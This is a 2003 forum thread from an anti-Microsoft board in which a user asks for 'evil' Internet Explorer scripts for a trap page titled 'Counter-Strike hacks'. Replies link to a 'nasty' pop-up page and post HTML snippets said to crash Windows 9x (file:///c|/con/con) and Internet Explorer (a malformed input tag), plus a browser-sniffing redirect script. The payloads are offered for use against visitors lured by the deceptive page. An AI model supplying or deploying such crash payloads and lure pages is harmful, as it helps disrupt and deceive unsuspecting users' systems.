Stop Microsoft

All Things Microsoft => Microsoft Software => Topic started by: ShawnD1 on 6 May 2003, 05:08

Title: any IE only script i can put on my website?
Post by: ShawnD1 on 6 May 2003, 05:08
i already have that cupholder script as my 404 page but is there any script that does something just evil like automatically add itself into favourites or remove favourites or jump the page around or something?

i want to put a really bad code on a page on my website which i will call "Counter-Strike hacks"  :D
Title: any IE only script i can put on my website?
Post by: Refalm on 7 May 2003, 00:29
This is a really nasty code... don't use this page immediatly, first READ MY DAMN INSTRUCTIONS!

Create a HTML file called open.html with this code (http://members.chello.nl/hf.wees/open.txt).

Then, I recommend using this flash movie (http://62.194.204.84/spaceball/lache/youare.swf). Otherwise, use any flash movie and call it "youare.swf".

However, if your good at editing HTML, you can probably manage it yourself  ;)
Title: any IE only script i can put on my website?
Post by: M51DPS on 7 May 2003, 00:41
I think this part crashes Windows 9x
 
quote:
<img src="file:///c|/con/con">
<frame src="file:///c|/con/con">


This part should crash Internet Explorer 4.x and above.
 
quote:
<form><input type crash></form>


Finally, insert the following code into every page, it detects if they're using IE and could redirect them anywhere you want  ;) .

 
quote:
<script language="javascript">
<!--
if (navigator.appName == "Microsoft Internet Explorer") {
        document.location = "http://www.domain.com/ie_reject.html";
} else {
        document.location = "http://www.domain.com/realhomepage.html";
}
// -->
</script>
Title: any IE only script i can put on my website?
Post by: Pantso on 7 May 2003, 00:53
Note: The JavaScript part will only work if the IE user has JavaScript enabled. Most of them though, don't even know what JavaScript is, so it will work on 80% of them. I'm mean..   :D